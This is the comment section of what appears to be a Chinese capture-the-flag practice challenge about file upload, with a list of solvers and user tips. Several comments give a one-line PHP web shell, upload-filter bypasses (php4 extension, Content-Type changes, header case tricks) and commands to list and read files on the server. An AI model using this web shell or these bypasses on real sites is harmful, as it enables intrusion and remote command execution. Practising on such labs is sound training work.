评分(19)
解题动态
无情的白给机器人 攻破了该题 4小时前
xiaoxiaojiangshi 攻破了该题 6小时前
sakita 攻破了该题 23小时前
w111 攻破了该题 2天前
是小白鸭 攻破了该题 4天前
yxrqq817423 攻破了该题 7天前
regvfds 攻破了该题 9天前
Wu. 攻破了该题 11天前
乱来小木 攻破了该题 11天前
2234223561 攻破了该题 11天前
大奇 攻破了该题 12天前
liqs 攻破了该题 13天前
yunlongli 攻破了该题 15天前
yyt030 攻破了该题 18天前
Tonytom 攻破了该题 24天前
Fengyu3321 攻破了该题 25天前
hdcc1 攻破了该题 28天前
kiritoldws 攻破了该题 1月前
6OGnwH04VnCx 攻破了该题 1月前
评论
是小白鸭 4天前
举报
方法分享:1.php内容:<?php eval($_REQUEST[cmd]);?>。2.绕过。3.运行php寻找flag位置,url?cmd=print_r(scandir['.']); 。4.发现flag文件,url?cmd=echo file_get_contents('../../../../flag'); 。初学者的一点小分享:)
李逍遥逛霍格沃茨 1月前
举报
能不能退金币 真被恶心到了
李逍遥逛霍格沃茨 1月前
举报
纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空
李逍遥逛霍格沃茨 1月前
举报
纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空
yuxuanlve 2月前
举报
为什么蚁剑死活连不上啊,改该的都改了啊,哥斯拉也连不上,评论全都看了一遍也没找到解决方案😭
ctfcaiji9527 2月前
举报
发现个问题,用yakit死活传不上去,用BP就行。( ╯□╰ )
jetxi 4月前
举报
php4和类型修改就可以绕过,可以放命令执行,或者直接蚁剑连,flag在根目录 data={'pass':"system('cat /flag');"}
desireart 5月前
举报
不知道,也没啥用,这种事情知道再多也没用,这辈子都知道不完
kaiyafanfan123 6月前
举报
而且正常图片上传,multipart/form-data 就合适
kaiyafanfan123 6月前
举报
有黑幕,, Multipart/form-data 和 multipart/form-data。 为啥就一个大小写区别,然后小写不能上传成功,,大写确可以。 套路赚金币吗??管理员
xjuqwd 4月前
举报
multipart/form-data 监测这个字符串大小写敏感,变任何字母大写 都绕过php后缀名监测